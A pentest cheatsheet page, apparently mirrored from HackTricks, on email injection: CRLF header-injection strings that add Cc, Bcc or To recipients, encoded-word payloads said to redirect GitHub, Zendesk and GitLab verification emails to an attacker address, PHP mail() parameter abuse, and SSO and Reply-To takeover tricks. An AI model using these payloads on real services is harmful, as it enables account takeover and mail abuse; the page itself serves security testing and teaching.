daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

email-injections.md (10749B)


      1 ---
      2 title: "Email Injections"
      3 section: "Web Pentesting"
      4 sectionSlug: "pentesting-web"
      5 sourcePath: "src/pentesting-web/email-injections.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/email-injections.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Email Injections
     14 
     15 ## Inject in sent e-mail
     16 
     17 ### Inject Cc and Bcc after sender argument
     18 
     19 ```text
     20 From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com
     21 ```
     22 
     23 The message will be sent to the recipient and recipient1 accounts.<sup>[[1]](#references)</sup>
     24 
     25 ### Inject argument
     26 
     27 ```text
     28 From:sender@domain.com%0ATo:attacker@domain.com
     29 ```
     30 
     31 The message will be sent to the original recipient and the attacker account.
     32 
     33 ### Inject Subject argument
     34 
     35 ```text
     36 From:sender@domain.com%0ASubject:This is%20Fake%20Subject
     37 ```
     38 
     39 The fake subject will be added to the original subject and in some cases will replace it. It depends on the mail service behavior.
     40 
     41 ### Change the body of the message
     42 
     43 Inject a two-line feed, then write your message to change the body of the message.
     44 
     45 ```text
     46 From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.
     47 ```
     48 
     49 ### PHP mail() function exploitation
     50 
     51 ```bash
     52 # The function has the following definition:
     53 
     54 php --rf mail
     55 
     56 Function [ <internal:standard> function mail ] {
     57   - Parameters [5] {
     58     Parameter #0 [ <required> $to ]
     59     Parameter #1 [ <required> $subject ]
     60     Parameter #2 [ <required> $message ]
     61     Parameter #3 [ <optional> $additional_headers ]
     62     Parameter #4 [ <optional> $additional_parameters ]
     63   }
     64 }
     65 ```
     66 
     67 #### The 5th parameter ($additional_parameters)
     68 
     69 This section is going to be based on **how to abuse this parameter supposing that an attacker controls it**.<sup>[[2]](#references)</sup>
     70 
     71 This parameter is going to be added to the command line PHP will be using to invoke the binary sendmail. However, it will be sanitised with the function `escapeshellcmd($additional_parameters)`.
     72 
     73 An attacker can **inject extract parameters for sendmail** in this case.
     74 
     75 #### Differences in the implementation of /usr/sbin/sendmail
     76 
     77 **sendmail** interface is **provided by the MTA email software** (Sendmail, Postfix, Exim etc.) installed on the system. Although the **basic functionality** (such as -t -i -f parameters) remains the **same** for compatibility reasons, **other functions and parameters** vary greatly depending on the MTA installed.
     78 
     79 Here are a few examples of different man pages of sendmail command/interface:
     80 
     81 - Sendmail MTA: http://www.sendmail.org/\~ca/email/man/sendmail.html
     82 - Postfix MTA: http://www.postfix.org/mailq.1.html
     83 - Exim MTA: https://linux.die.net/man/8/eximReferences
     84 
     85 Depending on the **origin of the sendmail** binary different options have been discovered to abuse them and l**eak files or even execute arbitrary commands**. Check how in [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)<sup>[[2]](#references)</sup>
     86 
     87 ## Inject in the e-mail name
     88 
     89 > [!CAUTION]
     90 > Note that if you manage to create an account in a service with an arbitrary domain name (like Github, Gitlab, CloudFlare Zero trust...) and verify it receiving the verification email in your mail address, you might be able to access sensitive locations of the victim company
     91 
     92 ### Ignored parts of an email
     93 
     94 The symbols: **+, -** and **{}** in rare occasions can be used for tagging and ignored by most e-mail servers<sup>[[6]](#references)</sup>
     95 
     96 - E.g. john.doe+intigriti@example.com → john.doe@example.com
     97 
     98 **Comments between parentheses ()** at the beginning or the end will also be ignored
     99 
    100 - E.g. john.doe(intigriti)@example.com → john.doe@example.com
    101 
    102 ### Whitelist bypass
    103 
    104 <figure><img src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28812%29.png" alt="https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0"><figcaption></figcaption></figure><sup>[[4]](#references)</sup>
    105 
    106 ### Quotes
    107 
    108 <figure><img src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28626%29.png" alt="https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0"><figcaption></figcaption></figure><sup>[[4]](#references)</sup>
    109 
    110 ### IPs
    111 
    112 You can also use IPs as domain named between square brackets:
    113 
    114 - john.doe@\[127.0.0.1]
    115 - john.doe@\[IPv6:2001:db8::1]
    116 
    117 ### Email Encoding
    118 
    119 As explained in [**this research**](https://portswigger.net/research/splitting-the-email-atom), email names also can also contain encoded characters:<sup>[[5]](#references)</sup>
    120 
    121 - **PHP 256 overflow**: PHP `chr` function will continue adding 256 to a char until it becames positive and then do the operation `%256`.
    122   - `String.fromCodePoint(0x10000 + 0x40) // 𐁀 → @`
    123 
    124 > [!TIP]
    125 > The goal of this trick is to end with an injection like `RCPT TO:<"collab@psres.net>collab"@example.com>`\
    126 > that will send the verification email to a different email address from the expected one (therefore to introduce another email address inside the email name and break the syntax when sending the email)
    127 
    128 Different encodings:
    129 
    130 ```bash
    131 # Format
    132 =? utf-8 ? q ? =41=42=43 ?= hi@example.com --> ABChi@example.com
    133 
    134 # =? -> Start of encode
    135 # utf-8 -> encoding used
    136 # ? -> separator
    137 # q -> type of encoding
    138 # ? -> separator
    139 # =41=42=43 -> Hex encoded data
    140 # ?= end of encoding
    141 
    142 # Other encodings, same example:
    143 # iso-8859-1
    144 =?iso-8859-1?q?=61=62=63?=hi@example.com
    145 # utf-8
    146 =?utf-8?q?=61=62=63?=hi@example.com
    147 # utf-7
    148 =?utf-7?q?<utf-7 encoded string>?=hi@example.com
    149 # q encoding + utf-7
    150 =?utf-7?q?&=41<utf-7 encoded string without initial A>?=hi@example.com
    151 # base64
    152 =?utf-8?b?QUJD?=hi@example.com
    153 # bas64 + utf-7
    154 =?utf-7?q?<utf-7 encoded string in base64>?=hi@example.com
    155 #punycode
    156 x@xn--svg/-9x6 → x@<svg/
    157 ```
    158 
    159 Payloads:
    160 
    161 - Github: `=?x?q?collab=40psres.net=3e=00?=foo@example.com`
    162   - Note the encoded `@` as =40, the encoded `>` as `=3e` and `null` as `=00`
    163   - It'll send the verification email to `collab@psres.net`
    164 - Zendesk: `"=?x?q?collab=22=40psres.net=3e=00==3c22x?="@example.com`
    165   - Same trick as before but adding some regular quote at the beginning and encoded qoute `=22` before the encoded `@` and then starting and close some qoutes before the next email to fix the syntax used internally by Zendesk
    166   - It'll send the verification email to `collab@psres.net`
    167 - Gitlab: `=?x?q?collab=40psres.net_?=foo@example.com`
    168   - Note the use of the underscore as a space to separate address
    169   - It'll send the verification email to `collab@psres.net`
    170 - Punycode: Using Punycode it was possible to inject a tag `<style` in Joomla and abuse it to steal the CSRF token via CSS exfiltration.
    171 
    172 #### Tooling
    173 
    174 - There is a **Burp Suite Turbo Intruder script** to fuzz these kind of combinations to try to attack email formats. The script already have potentially working combinations.
    175 - It's laso possible to use [Hackvertor](https://portswigger.net/bappstore/65033cbd2c344fbabe57ac060b5dd100) to create an email splitting attack
    176 
    177 ### Other vulns
    178 
    179 ![https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%281131%29.png)<sup>[[4]](#references)</sup>
    180 
    181 ## Third party SSO
    182 
    183 ### XSS
    184 
    185 Some services like **github** or **salesforce allows** you to create an **email address with XSS payloads on it**. If you can **use this providers to login on other services** and this services **aren't sanitising** correctly the email, you could cause **XSS**.
    186 
    187 ### Account-Takeover
    188 
    189 If a **SSO service** allows you to **create an account without verifying the given email address** (like **salesforce**) and then you can use that account to **login in a different service** that **trusts** salesforce, you could access any account.\
    190 _Note that salesforce indicates if the given email was or not verified but so the application should take into account this info._<sup>[[3]](#references)</sup>
    191 
    192 ## Reply-To
    193 
    194 You can send an email using _**From: company.com**_ and _**Replay-To: attacker.com**_ and if any **automatic reply** is sent due to the email was sent **from** an **internal address** the **attacker** may be able to **receive** that **response**.
    195 
    196 ## Hard Bounce Rate
    197 
    198 Certain services, like AWS, implement a threshold known as the **Hard Bounce Rate**, typically set at 10%. This is a critical metric, especially for email delivery services. When this rate is exceeded, the service, such as AWS's email service, may be suspended or blocked.
    199 
    200 A **hard bounce** refers to an **email** that has been returned to the sender because the recipient's address is invalid or non-existent. This could occur due to various reasons, such as the **email** being sent to a non-existing address, a domain that isn't real, or the recipient server's refusal to accept **emails**.
    201 
    202 In the context of AWS, if you send 1000 emails and 100 of them result in hard bounces (due to reasons like invalid addresses or domains), this would mean a 10% hard bounce rate. Reaching or exceeding this rate can trigger AWS SES (Simple Email Service) to block or suspend your email sending capabilities.
    203 
    204 It's crucial to maintain a low hard bounce rate to ensure uninterrupted email service and maintain sender reputation. Monitoring and managing the quality of the email addresses in your mailing lists can significantly help in achieving this.
    205 
    206 For more detailed information, AWS's official documentation on handling bounces and complaints can be referred to [AWS SES Bounce Handling](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#bounce-types).<sup>[[7]](#references)</sup>
    207 
    208 ## References
    209 
    210 - [1] [Email Injection](https://resources.infosecinstitute.com/email-injection/)
    211 - [2] [Pwning PHP Mail Function For Fun And RCE](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
    212 - [3] [You've Got Pwned - abusing SSO/email account takeover](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view)
    213 - [4] [Email injection tricks (whitelist bypass, quotes, other vulns) - YouTube](https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0)
    214 - [5] [Splitting the email atom: exploiting parsers to bypass access controls](https://portswigger.net/research/splitting-the-email-atom)
    215 - [6] [#NahamCon2022EU: RTFR (Read The Bleeping RFC) - securinti](https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0)
    216 - [7] [docs.aws.amazon.com - AWS SES Bounce Handling](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#bounce-types)